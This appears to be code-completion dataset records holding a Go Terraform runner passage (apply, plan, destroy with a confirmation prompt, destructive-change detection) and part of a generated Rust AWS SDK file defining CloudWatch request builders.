if r.changeSettings.SkipChangesOnDeny {
return true, nil
}
return false, ErrTerraformApplyAborted
}
return false, nil
}
func (r *Runner) Apply() error {
if r.stopped {
return ErrRunnerStopped
}
return log.Process("default", "terraform apply ...", func() error {
var err error
if r.stateSaver != nil {
err = r.stateSaver.Start(r)
if err != nil {
return err
}
defer r.stateSaver.Stop()
}
skip, err := r.handleChanges()
if err != nil {
return err
}
if skip {
log.InfoLn("Skip terraform apply.")
return nil
}
args := []string{
"apply",
"-input=false",
"-no-color",
"-auto-approve",
fmt.Sprintf("-state=%s", r.statePath),
fmt.Sprintf("-state-out=%s", r.statePath),
}
if r.planPath != "" {
args = append(args, r.planPath)
} else {
args = append(args,
fmt.Sprintf("-var-file=%s", r.variablesPath),
r.workingDir,
)
}
var allErrs *multierror.Error
_, err = r.execTerraform(args...)
if err != nil {
allErrs = multierror.Append(allErrs, err)
// yes, no return, we need to add state to cache anyway
}
data, err := r.getState()
if err != nil {
allErrs = multierror.Append(allErrs, err)
// don't get state - return all errors
return allErrs.ErrorOrNil()
}
err = r.stateCache.Save(r.stateName(), data)
if err != nil {
allErrs = multierror.Append(allErrs, err)
}
return allErrs.ErrorOrNil()
})
}
func (r *Runner) Plan() error {
if r.stopped {
return ErrRunnerStopped
}
return log.Process("default", "terraform plan ...", func() error {
tmpFile, err := ioutil.TempFile(app.TmpDirName, r.step+deckhousePlanSuffix)
if err != nil {
return fmt.Errorf("can't create temp file for plan: %w", err)
}
args := []string{
"plan",
"-input=false",
"-no-color",
"-detailed-exitcode",
fmt.Sprintf("-var-file=%s", r.variablesPath),
fmt.Sprintf("-state=%s", r.statePath),
fmt.Sprintf("-out=%s", tmpFile.Name()),
}
args = append(args, r.workingDir)
exitCode, err := r.execTerraform(args...)
if exitCode == terraformHasChangesExitCode {
r.changesInPlan = PlanHasChanges
hasDestructiveChanges, err := checkPlanDestructiveChanges(tmpFile.Name())
if err != nil {
return err
}
if hasDestructiveChanges {
r.changesInPlan = PlanHasDestructiveChanges
}
} else if err != nil {
return err
}
r.planPath = tmpFile.Name()
return nil
})
}
func (r *Runner) GetTerraformOutput(output string) ([]byte, error) {
if r.stopped {
return nil, ErrRunnerStopped
}
if r.statePath == "" {
return nil, fmt.Errorf("no state found, try to run terraform apply first")
}
args := []string{
"output",
"-no-color",
"-json",
fmt.Sprintf("-state=%s", r.statePath),
}
args = append(args, output)
result, err := terraformCmd(args...).Output()
if err != nil {
if ee, ok := err.(*exec.ExitError); ok {
err = fmt.Errorf("%s\n%v", string(ee.Stderr), err)
}
return nil, fmt.Errorf("can't get terraform output for %q\n%v", output, err)
}
return result, nil
}
func (r *Runner) Destroy() error {
if r.stopped {
return ErrRunnerStopped
}
if r.statePath == "" {
return fmt.Errorf("no state found, try to run terraform apply first")
}
if r.changeSettings.AutoDismissDestructive {
log.InfoLn("terraform destroy skipped")
return nil
} | if !r.changeSettings.AutoApprove {
if !r.confirm().WithMessage("Do you want to DELETE objects from the cloud?").Ask() {
return fmt.Errorf("terraform destroy aborted")
}
}
// TODO: why is this line here?
// r.stopped = true
return log.Process("default", "terraform destroy ...", func() error {
var err error
if r.stateSaver != nil {
err = r.stateSaver.Start(r)
if err != nil {
return err
}
defer r.stateSaver.Stop()
}
args := []string{
"destroy",
"-no-color",
"-auto-approve",
fmt.Sprintf("-var-file=%s", r.variablesPath),
fmt.Sprintf("-state=%s", r.statePath),
}
args = append(args, r.workingDir)
if _, err = r.execTerraform(args...); err != nil {
return err
}
return nil
})
}
func (r *Runner) ResourcesQuantityInState() int {
if r.statePath == "" {
return 0
}
data, err := ioutil.ReadFile(r.statePath)
if err != nil {
log.ErrorLn(err)
return 0
}
var st struct {
Resources []json.RawMessage `json:"resources"`
}
err = json.Unmarshal(data, &st)
if err != nil {
log.ErrorLn(err)
return 0
}
return len(st.Resources)
}
func (r *Runner) getState() ([]byte, error) {
return ioutil.ReadFile(r.statePath)
}
// Stop interrupts the current runner command and sets
// a flag to prevent executions of next runner commands.
func (r *Runner) Stop() {
if r.cmd != nil && !r.stopped {
log.DebugF("Runner Stop is called for %s. Interrupt terraform process by pid: %d\n", r.name, r.cmd.Process.Pid)
// 1. Terraform exits immediately on SIGTERM, so SIGINT is used here
// to interrupt it gracefully even when main process caught the SIGTERM.
// 2. Negative pid is used to send signal to the process group
// started by "Setpgid: true" to prevent double signaling
// from shell and from us.
// See also pkg/system/ssh/cmd/ssh.go
_ = syscall.Kill(-r.cmd.Process.Pid, syscall.SIGINT)
}
r.stopped = true
// Wait until the running terraform command stops.
for r.cmd != nil {
time.Sleep(50 * time.Millisecond)
}
// Wait until the StateSaver saves the Secret for Apply and Destroy commands.
if r.stateSaver != nil && r.stateSaver.IsStarted() {
<-r.stateSaver.DoneCh()
}
}
func (r *Runner) execTerraform(args ...string) (int, error) {
r.cmd = terraformCmd(args...)
// Start terraform as a leader of the new process group to prevent
// os.Interrupt (SIGINT) signal from the shell when Ctrl-C is pressed.
r.cmd.SysProcAttr = &syscall.SysProcAttr{
Setpgid: true,
}
stdout, err := r.cmd.StdoutPipe()
if err != nil {
return 1, fmt.Errorf("stdout pipe: %v", err)
}
stderr, err := r.cmd.StderrPipe()
if err != nil {
return 1, fmt.Errorf("stderr pipe: %v", err)
}
log.DebugLn(r.cmd.String())
err = r.cmd.Start()
if err != nil {
log.ErrorLn(err)
return r.cmd.ProcessState.ExitCode(), err
}
var errBuf bytes.Buffer
waitCh := make(chan error)
go func() {
e := bufio.NewScanner(stderr)
for e.Scan() {
if app.IsDebug {
log.DebugLn(e.Text())
} else {
errBuf.WriteString(e.Text() + "\n")
}
}
waitCh <- r.cmd.Wait()
}()
s := bufio.NewScanner(stdout)
for s.Scan() {
log.InfoLn(s.Text())
}
err = <-waitCh
log.InfoF("Terraform runner %q process exited.\n", r.step)
exitCode := r.cmd.ProcessState.ExitCode() // 2 = exit code, if terraform plan has diff
if err != nil && exitCode != terraformHasChangesExitCode {
log.ErrorLn(err)
err = fmt.Errorf(errBuf.String())
if app.IsDebug {
err = fmt.Errorf("terraform has failed in DEBUG mode, search in the output above for an error")
}
}
r.cmd = nil
if exitCode == 0 {
err = nil
}
return exitCode, err
}
func buildTerraformPath(provider, layout, step string) string {
return filepath.Join(cloudProvidersDir, provider, "layouts", layout, step)
}
func terraformCmd(args ...string) *exec.Cmd {
cmd := exec.Command("terraform", args...)
cmd.Env = append(
cmd.Env,
"TF_IN_AUTOMATION=yes", "TF_DATA_DIR="+filepath.Join(app.TmpDirName, "tf_dhctl"),
)
if app.IsDebug {
// Debug mode is deprecated, however trace produces more useless information
cmd.Env = append(cmd.Env, "TF_LOG=DEBUG")
}
return cmd
}
func checkPlanDestructiveChanges(planFile string) (bool, error) {
args := []string{
"show",
"-json",
planFile,
}
result, err := terraformCmd(args...).Output()
if err != nil {
var ee *exec.ExitError
if ok := errors.As(err, &ee); ok {
err = fmt.Errorf("%s\n%v", string(ee.Stderr), err)
}
return false, fmt.Errorf("can't get terraform plan for %q\n%v", planFile, err)
}
var changes struct {
ResourcesChanges []struct {
Change struct {
Actions []string `json:"actions"`
} `json:"change"`
} `json:"resource_changes"`
}
err = json.Unmarshal(result, &changes)
if err != nil {
return false, err
}
for _, resource := range changes.ResourcesChanges {
for _, action := range resource.Change.Actions {
if action == "delete" {
return true, nil
}
}
}
return false, nil
} | |
input.rs | // Code generated by software.amazon.smithy.rust.codegen.smithy-rs. DO NOT EDIT.
use std::fmt::Write;
/// See [`DeleteAlarmsInput`](crate::input::DeleteAlarmsInput)
pub mod delete_alarms_input {
/// A builder for [`DeleteAlarmsInput`](crate::input::DeleteAlarmsInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) alarm_names: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl Builder {
pub fn alarm_names(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.alarm_names.unwrap_or_default();
v.push(input.into());
self.alarm_names = Some(v);
self
}
pub fn set_alarm_names(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.alarm_names = input;
self
}
/// Consumes the builder and constructs a [`DeleteAlarmsInput`](crate::input::DeleteAlarmsInput)
pub fn build(
self,
) -> std::result::Result<crate::input::DeleteAlarmsInput, smithy_http::operation::BuildError>
{
Ok(crate::input::DeleteAlarmsInput {
alarm_names: self.alarm_names,
})
}
}
}
#[doc(hidden)]
pub type DeleteAlarmsInputOperationOutputAlias = crate::operation::DeleteAlarms;
#[doc(hidden)]
pub type DeleteAlarmsInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl DeleteAlarmsInput {
/// Consumes the builder and constructs an Operation<[`DeleteAlarms`](crate::operation::DeleteAlarms)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::DeleteAlarms,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body =
crate::operation_ser::serialize_operation_delete_alarms(&self).map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::DeleteAlarms::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"DeleteAlarms",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`DeleteAlarmsInput`](crate::input::DeleteAlarmsInput)
pub fn builder() -> crate::input::delete_alarms_input::Builder {
crate::input::delete_alarms_input::Builder::default()
}
}
/// See [`DeleteAnomalyDetectorInput`](crate::input::DeleteAnomalyDetectorInput)
pub mod delete_anomaly_detector_input {
/// A builder for [`DeleteAnomalyDetectorInput`](crate::input::DeleteAnomalyDetectorInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) namespace: std::option::Option<std::string::String>,
pub(crate) metric_name: std::option::Option<std::string::String>,
pub(crate) dimensions: std::option::Option<std::vec::Vec<crate::model::Dimension>>,
pub(crate) stat: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The namespace associated with the anomaly detection model to delete.</p>
pub fn namespace(mut self, input: impl Into<std::string::String>) -> Self {
self.namespace = Some(input.into());
self
}
pub fn set_namespace(mut self, input: std::option::Option<std::string::String>) -> Self {
self.namespace = input;
self
}
/// <p>The metric name associated with the anomaly detection model to delete.</p>
pub fn metric_name(mut self, input: impl Into<std::string::String>) -> Self {
self.metric_name = Some(input.into());
self
}
pub fn set_metric_name(mut self, input: std::option::Option<std::string::String>) -> Self {
self.metric_name = input;
self
}
pub fn dimensions(mut self, input: impl Into<crate::model::Dimension>) -> Self {
let mut v = self.dimensions.unwrap_or_default();
v.push(input.into());
self.dimensions = Some(v);
self
}
pub fn set_dimensions(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::Dimension>>,
) -> Self {
self.dimensions = input;
self
}
/// <p>The statistic associated with the anomaly detection model to delete.</p>
pub fn stat(mut self, input: impl Into<std::string::String>) -> Self {
self.stat = Some(input.into());
self
}
pub fn set_stat(mut self, input: std::option::Option<std::string::String>) -> Self {
self.stat = input;
self
}
/// Consumes the builder and constructs a [`DeleteAnomalyDetectorInput`](crate::input::DeleteAnomalyDetectorInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::DeleteAnomalyDetectorInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::DeleteAnomalyDetectorInput {
namespace: self.namespace,
metric_name: self.metric_name,
dimensions: self.dimensions,
stat: self.stat,
})
}
}
}
#[doc(hidden)]
pub type DeleteAnomalyDetectorInputOperationOutputAlias = crate::operation::DeleteAnomalyDetector;
#[doc(hidden)]
pub type DeleteAnomalyDetectorInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl DeleteAnomalyDetectorInput {
/// Consumes the builder and constructs an Operation<[`DeleteAnomalyDetector`](crate::operation::DeleteAnomalyDetector)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::DeleteAnomalyDetector,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_delete_anomaly_detector(&self)
.map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::DeleteAnomalyDetector::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"DeleteAnomalyDetector",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`DeleteAnomalyDetectorInput`](crate::input::DeleteAnomalyDetectorInput)
pub fn builder() -> crate::input::delete_anomaly_detector_input::Builder {
crate::input::delete_anomaly_detector_input::Builder::default()
}
}
/// See [`DeleteDashboardsInput`](crate::input::DeleteDashboardsInput)
pub mod delete_dashboards_input {
/// A builder for [`DeleteDashboardsInput`](crate::input::DeleteDashboardsInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) dashboard_names: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl Builder {
pub fn dashboard_names(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.dashboard_names.unwrap_or_default();
v.push(input.into());
self.dashboard_names = Some(v);
self
}
pub fn set_dashboard_names(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.dashboard_names = input;
self
}
/// Consumes the builder and constructs a [`DeleteDashboardsInput`](crate::input::DeleteDashboardsInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::DeleteDashboardsInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::DeleteDashboardsInput {
dashboard_names: self.dashboard_names,
})
}
}
}
#[doc(hidden)]
pub type DeleteDashboardsInputOperationOutputAlias = crate::operation::DeleteDashboards;
#[doc(hidden)]
pub type DeleteDashboardsInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl DeleteDashboardsInput {
/// Consumes the builder and constructs an Operation<[`DeleteDashboards`](crate::operation::DeleteDashboards)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::DeleteDashboards,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_delete_dashboards(&self).map_err(
|err| smithy_http::operation::BuildError::SerializationError(err.into()),
)?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::DeleteDashboards::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"DeleteDashboards",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`DeleteDashboardsInput`](crate::input::DeleteDashboardsInput)
pub fn builder() -> crate::input::delete_dashboards_input::Builder {
crate::input::delete_dashboards_input::Builder::default()
}
}
/// See [`DeleteInsightRulesInput`](crate::input::DeleteInsightRulesInput)
pub mod delete_insight_rules_input {
/// A builder for [`DeleteInsightRulesInput`](crate::input::DeleteInsightRulesInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) rule_names: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl Builder {
pub fn rule_names(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.rule_names.unwrap_or_default();
v.push(input.into());
self.rule_names = Some(v);
self
}
pub fn set_rule_names(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.rule_names = input;
self
}
/// Consumes the builder and constructs a [`DeleteInsightRulesInput`](crate::input::DeleteInsightRulesInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::DeleteInsightRulesInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::DeleteInsightRulesInput {
rule_names: self.rule_names,
})
}
}
}
#[doc(hidden)]
pub type DeleteInsightRulesInputOperationOutputAlias = crate::operation::DeleteInsightRules;
#[doc(hidden)]
pub type DeleteInsightRulesInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl DeleteInsightRulesInput {
/// Consumes the builder and constructs an Operation<[`DeleteInsightRules`](crate::operation::DeleteInsightRules)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::DeleteInsightRules,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_delete_insight_rules(&self)
.map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::DeleteInsightRules::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"DeleteInsightRules",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`DeleteInsightRulesInput`](crate::input::DeleteInsightRulesInput)
pub fn builder() -> crate::input::delete_insight_rules_input::Builder {
crate::input::delete_insight_rules_input::Builder::default()
}
}
/// See [`DeleteMetricStreamInput`](crate::input::DeleteMetricStreamInput)
pub mod delete_metric_stream_input {
/// A builder for [`DeleteMetricStreamInput`](crate::input::DeleteMetricStreamInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) name: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The name of the metric stream to delete.</p>
pub fn name(mut self, input: impl Into<std::string::String>) -> Self {
self.name = Some(input.into());
self
}
pub fn set_name(mut self, input: std::option::Option<std::string::String>) -> Self {
self.name = input;
self
}
/// Consumes the builder and constructs a [`DeleteMetricStreamInput`](crate::input::DeleteMetricStreamInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::DeleteMetricStreamInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::DeleteMetricStreamInput { name: self.name })
}
}
}
#[doc(hidden)]
pub type DeleteMetricStreamInputOperationOutputAlias = crate::operation::DeleteMetricStream;
#[doc(hidden)]
pub type DeleteMetricStreamInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl DeleteMetricStreamInput {
/// Consumes the builder and constructs an Operation<[`DeleteMetricStream`](crate::operation::DeleteMetricStream)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::DeleteMetricStream,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_delete_metric_stream(&self)
.map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::DeleteMetricStream::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"DeleteMetricStream",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`DeleteMetricStreamInput`](crate::input::DeleteMetricStreamInput)
pub fn builder() -> crate::input::delete_metric_stream_input::Builder {
crate::input::delete_metric_stream_input::Builder::default()
}
}
/// See [`DescribeAlarmHistoryInput`](crate::input::DescribeAlarmHistoryInput)
pub mod describe_alarm_history_input {
/// A builder for [`DescribeAlarmHistoryInput`](crate::input::DescribeAlarmHistoryInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) alarm_name: std::option::Option<std::string::String>,
pub(crate) alarm_types: std::option::Option<std::vec::Vec<crate::model::AlarmType>>,
pub(crate) history_item_type: std::option::Option<crate::model::HistoryItemType>,
pub(crate) start_date: std::option::Option<smithy_types::Instant>,
pub(crate) end_date: std::option::Option<smithy_types::Instant>,
pub(crate) max_records: std::option::Option<i32>,
pub(crate) next_token: std::option::Option<std::string::String>,
pub(crate) scan_by: std::option::Option<crate::model::ScanBy>,
}
impl Builder {
/// <p>The name of the alarm.</p>
pub fn alarm_name(mut self, input: impl Into<std::string::String>) -> Self {
self.alarm_name = Some(input.into());
self
}
pub fn set_alarm_name(mut self, input: std::option::Option<std::string::String>) -> Self {
self.alarm_name = input;
self
}
pub fn alarm_types(mut self, input: impl Into<crate::model::AlarmType>) -> Self {
let mut v = self.alarm_types.unwrap_or_default();
v.push(input.into());
self.alarm_types = Some(v);
self
}
pub fn set_alarm_types(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::AlarmType>>,
) -> Self {
self.alarm_types = input;
self
}
/// <p>The type of alarm histories to retrieve.</p>
pub fn history_item_type(mut self, input: crate::model::HistoryItemType) -> Self {
self.history_item_type = Some(input);
self
}
pub fn set_history_item_type(
mut self,
input: std::option::Option<crate::model::HistoryItemType>,
) -> Self {
self.history_item_type = input;
self
}
/// <p>The starting date to retrieve alarm history.</p>
pub fn start_date(mut self, input: smithy_types::Instant) -> Self {
self.start_date = Some(input);
self
}
pub fn set_start_date(mut self, input: std::option::Option<smithy_types::Instant>) -> Self {
self.start_date = input;
self
}
/// <p>The ending date to retrieve alarm history.</p>
